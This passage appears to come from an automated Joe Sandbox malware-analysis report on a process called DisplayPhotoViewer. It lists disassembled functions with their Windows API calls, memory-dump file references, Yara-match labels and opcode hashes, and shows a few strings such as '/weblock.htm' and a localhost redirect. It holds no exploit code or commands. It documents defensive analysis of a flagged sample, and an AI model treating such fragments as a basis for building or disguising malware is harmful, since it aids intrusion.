                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EnumValue$CloseOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3785232357-0
                                                                                                    • Opcode ID: 655ba5674b5da0d14a8c0d024d204b748ccab103b288080bd324ef5a96fcb515
                                                                                                    • Instruction ID: 0ec56bbf0fa01af7698538f10635e60369797716f7b9b0e4c5c94c10d7a1f6d4
                                                                                                    • Opcode Fuzzy Hash: 655ba5674b5da0d14a8c0d024d204b748ccab103b288080bd324ef5a96fcb515
                                                                                                    • Instruction Fuzzy Hash: EB414FB59006199BDBA0CB54CC84FDFBBB8EB44305F0085D9E649D7141EB709B89CFA1
                                                                                                    Function 110D3100 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memmove
                                                                                                    • String ID:
                                                                                                    • API String ID: 4104443479-0
                                                                                                    • Opcode ID: c616c7afdffe3b10bc214a725739a1f5fe0c5b56c0e8f0299b435af8898d2b75
                                                                                                    • Instruction ID: 4bf528ea9841c980b0a3bb76893910a3b13b0c695b17b1c75d6bb0c814f4e49b
                                                                                                    • Opcode Fuzzy Hash: c616c7afdffe3b10bc214a725739a1f5fe0c5b56c0e8f0299b435af8898d2b75
                                                                                                    • Instruction Fuzzy Hash: 8A31A2B6B006019FDB14CEADDDC196BF7AAEBD4615708C52EE906CB344EA71F901C6A0
                                                                                                    Function 10704D01 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • InterlockedIncrement.KERNEL32(10723E48), ref: 10704D45
                                                                                                    • InterlockedDecrement.KERNEL32(10723E48), ref: 10704D54
                                                                                                    • InterlockedDecrement.KERNEL32(10723E48), ref: 10704D87
                                                                                                    • InterlockedDecrement.KERNEL32(10723E48), ref: 10704E1F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Interlocked$Decrement$Increment
                                                                                                    • String ID:
                                                                                                    • API String ID: 2574743344-0
                                                                                                    • Opcode ID: cbd18e2f06b2efacc244ea74ea770374ba9bd6ca539970eee70193cb534b8f4f
                                                                                                    • Instruction ID: 364370022bc2e34e46ff2f837a9ef0e200c31e305af6e81e2dffc0eecca8c16e
                                                                                                    • Opcode Fuzzy Hash: cbd18e2f06b2efacc244ea74ea770374ba9bd6ca539970eee70193cb534b8f4f
                                                                                                    • Instruction Fuzzy Hash: C831D2B1A04265FFEB120B60EC89B9E7FE8EB07B61F104259F644952D8CE745AC0D7A0
                                                                                                    Function 10704F77 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • InterlockedIncrement.KERNEL32(10723E48), ref: 10704FBB
                                                                                                    • InterlockedDecrement.KERNEL32(10723E48), ref: 10704FCA
                                                                                                    • InterlockedDecrement.KERNEL32(10723E48), ref: 10704FFD
                                                                                                    • InterlockedDecrement.KERNEL32(10723E48), ref: 10705095
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Interlocked$Decrement$Increment
                                                                                                    • String ID:
                                                                                                    • API String ID: 2574743344-0
                                                                                                    • Opcode ID: d18788f57dd83e9ac12c9c8b13a096e01fcdb64ff5da74fa55eaa86feb61763a
                                                                                                    • Instruction ID: 4f01fa88978045918241413ca5a3a4c0a8af3a7e14be92d8bca0dab652a89164
                                                                                                    • Opcode Fuzzy Hash: d18788f57dd83e9ac12c9c8b13a096e01fcdb64ff5da74fa55eaa86feb61763a
                                                                                                    • Instruction Fuzzy Hash: 8931DD71A04266EFEB120B60EC89BAF7FE4EB07760F148355F544592D8DAB45AC0CBA0
                                                                                                    Function 1111D060 Relevance: 6.1, APIs: 4, Instructions: 114COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • DeleteObject.GDI32(?), ref: 1111D169
                                                                                                    • GlobalDeleteAtom.KERNEL32 ref: 1111D177
                                                                                                    • CloseHandle.KERNEL32(?), ref: 1111D188
                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 1111D192
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Delete$AtomCloseCriticalGlobalHandleObjectSection
                                                                                                    • String ID:
                                                                                                    • API String ID: 2137257056-0
                                                                                                    • Opcode ID: dc2b059acc622a1a3680aa8f2dd746bf4887317ddde32d325986878ca78a8c13
                                                                                                    • Instruction ID: 8c9ff61caaab508548d8c931887f3f2b32507cee037fa3ecd8580529de34bd54
                                                                                                    • Opcode Fuzzy Hash: dc2b059acc622a1a3680aa8f2dd746bf4887317ddde32d325986878ca78a8c13
                                                                                                    • Instruction Fuzzy Hash: B531A0B5700B015BDA10EB75DD84B6FF7AAAF84708F54442CE95A8B244EA31F801CB51
                                                                                                    Function 1070BBD7 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 103COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 10707967: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,10708E6F,00000002,?,?,5C74726F,1070599D,?,107059D7,10712290,10712290,00000040,10702706), ref: 107079A4
                                                                                                      • Part of subcall function 10707967: EnterCriticalSection.KERNEL32(?,?,?,10708E6F,00000002,?,?,5C74726F,1070599D,?,107059D7,10712290,10712290,00000040,10702706,?), ref: 107079BF
                                                                                                    • InitializeCriticalSection.KERNEL32(00000068,00000100,00000080,?,00000000,10712290,10712290,1070C5F8,10712291,00000000,00000000), ref: 1070BC2A
                                                                                                    • EnterCriticalSection.KERNEL32(00000068,00000100,00000080,?,00000000,10712290,10712290,1070C5F8,10712291,00000000,00000000), ref: 1070BC3F
                                                                                                    • LeaveCriticalSection.KERNEL32(00000068,?,00000000,10712290,10712290,1070C5F8,10712291,00000000,00000000), ref: 1070BC4C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterInitialize$Leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 713024617-3916222277
                                                                                                    • Opcode ID: 5afe42424257d4c71e7ee157c7a10a5e51630bb7ce209fba5b2492519c0fb7b0
                                                                                                    • Instruction ID: 0c41087d6cabbb073b12693cec8dc4fceecf23ae13ce8836ea2e741243a47f9c
                                                                                                    • Opcode Fuzzy Hash: 5afe42424257d4c71e7ee157c7a10a5e51630bb7ce209fba5b2492519c0fb7b0
                                                                                                    • Instruction Fuzzy Hash: DC3103726043459FE3008F60ECC8B6B77D4FB46328F258B2DE566871D5DBB0EA488765
                                                                                                    Function 1100B9B0 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
                                                                                                      • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
                                                                                                      • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
                                                                                                    • std::exception::exception.LIBCMT ref: 1100BA70
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 1100BA85
                                                                                                    • std::exception::exception.LIBCMT ref: 1100BA94
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 1100BAA9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throwstd::exception::exception$_malloc_memsetwsprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 1651403513-0
                                                                                                    • Opcode ID: 4c2c56a0f462b3ba29ae9e57cc29c94ac5cd7717c09edcf52774a7d665538cfd
                                                                                                    • Instruction ID: 6dcaf9a2e97153f1f87de90c54018d9e8ce836376deaebf966d319155ee6a7e2
                                                                                                    • Opcode Fuzzy Hash: 4c2c56a0f462b3ba29ae9e57cc29c94ac5cd7717c09edcf52774a7d665538cfd
                                                                                                    • Instruction Fuzzy Hash: 3A31AEB5D04A089FC751CF98D880A9AFBF4EF59214F54856EE85A97700E731EA04CBA2
                                                                                                    Function 1103B550 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 68sleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(000001F4,00000000,?,00000000,-111E103C), ref: 1103B581
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID: /weblock.htm$:%u$redirect:http://127.0.0.1
                                                                                                    • API String ID: 3472027048-2181447511
                                                                                                    • Opcode ID: ba6b0a06242972b677865cff722bf85bb8d0ce1262fe60012f0f34aa7e761ddf
                                                                                                    • Instruction ID: 9e071808c2360e470c9c19801e8b794b24165b97e2317bd6a66cd8554c345fb9
                                                                                                    • Opcode Fuzzy Hash: ba6b0a06242972b677865cff722bf85bb8d0ce1262fe60012f0f34aa7e761ddf
                                                                                                    • Instruction Fuzzy Hash: 2B110835F0011AABFB14DBB5DC41FBEB7A99B8571CF0401E9E819972C0EE746E4187A1
                                                                                                    Function 1070ECD5 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,?,?), ref: 1070ED04
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 1070ED17
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 1070ED63
                                                                                                    • CompareStringW.KERNEL32(?,?,?,?,?,00000000,?,00000000), ref: 1070ED7B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$CompareString
                                                                                                    • String ID:
                                                                                                    • API String ID: 376665442-0
                                                                                                    • Opcode ID: 54508fe3e061ea5ccf63e725e8d34fc255693fe6ef409b678752165313e13d86
                                                                                                    • Instruction ID: 0ccd13d17297b12f0de3ae8df798ac2b762c8b6fe12acc54d2d368dbe66ec805
                                                                                                    • Opcode Fuzzy Hash: 54508fe3e061ea5ccf63e725e8d34fc255693fe6ef409b678752165313e13d86
                                                                                                    • Instruction Fuzzy Hash: E2212732A0025DEBCF118F94DD45ADEBFB5FF49760F118629FA14721A0C3329A21DBA0
                                                                                                    Function 11047520 Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$_malloc_memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2102557794-0
                                                                                                    • Opcode ID: dd380ccebec616add4d57db5192bb67ae63f0ae5345edbf276a0e8c1d52a71ab
                                                                                                    • Instruction ID: fad5a55771693966d439e4905fe36354cef0a59d87746f98efdacf8fe19d4d89
                                                                                                    • Opcode Fuzzy Hash: dd380ccebec616add4d57db5192bb67ae63f0ae5345edbf276a0e8c1d52a71ab
                                                                                                    • Instruction Fuzzy Hash: CA1129359006456BD351CE18D880FDB7B989F42318F148078FC995F351E6B5F649C7E1
                                                                                                    Function 110F1740 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 110F1750
                                                                                                    • GetSystemMetrics.USER32(0000004C), ref: 110F1773
                                                                                                    • GetSystemMetrics.USER32(0000004D), ref: 110F177A
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 110F1781
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MetricsSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 4116985748-0
                                                                                                    • Opcode ID: 19459ac26326e810422fd0ff1216cc4ad5130b3769f1184bf9a9ae09cd826161
                                                                                                    • Instruction ID: 86679de81580e02b043dc5a2f764f4066cdf96cf2115ccb9999bc1937dbb7bc0
                                                                                                    • Opcode Fuzzy Hash: 19459ac26326e810422fd0ff1216cc4ad5130b3769f1184bf9a9ae09cd826161
                                                                                                    • Instruction Fuzzy Hash: DF0175757002156FE340DAADCC91F6A77E9EF88350F108026FA18CB281DA71DC018B90
                                                                                                    Function 1111D760 Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(0000004E), ref: 1111D788
                                                                                                    • GetSystemMetrics.USER32(0000004F), ref: 1111D78F
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 1111D7AC
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 1111D7B9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MetricsSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 4116985748-0
                                                                                                    • Opcode ID: dd2ad85aecdb52b3e78a58338cb9141ec551c57e15f1b879eb0e565802e391c1
                                                                                                    • Instruction ID: 16fd7b9be472d3ffde4cdae9415a1af95edf42c405e12a88dce8c27362abea0d
                                                                                                    • Opcode Fuzzy Hash: dd2ad85aecdb52b3e78a58338cb9141ec551c57e15f1b879eb0e565802e391c1
                                                                                                    • Instruction Fuzzy Hash: C6011971600B559FE720EFB9C984B0AF7E4AF84B18F11C83ED65E8B690D6B4A480CB51
                                                                                                    Function 11081200 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNEL32(?,74DEF550,?,?,11081840,?,1102FEA2,0B233858,00000000,?,?,?), ref: 11081218
                                                                                                    • CloseHandle.KERNEL32(?,74DEF550,?,?,11081840,?,1102FEA2,0B233858,00000000,?,?,?), ref: 1108122B
                                                                                                    • CloseHandle.KERNEL32(?,74DEF550,?,?,11081840,?,1102FEA2,0B233858,00000000,?,?,?), ref: 1108123E
                                                                                                    • FreeLibrary.KERNEL32(00000000,74DEF550,?,?,11081840,?,1102FEA2,0B233858,00000000,?,?,?), ref: 11081251
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
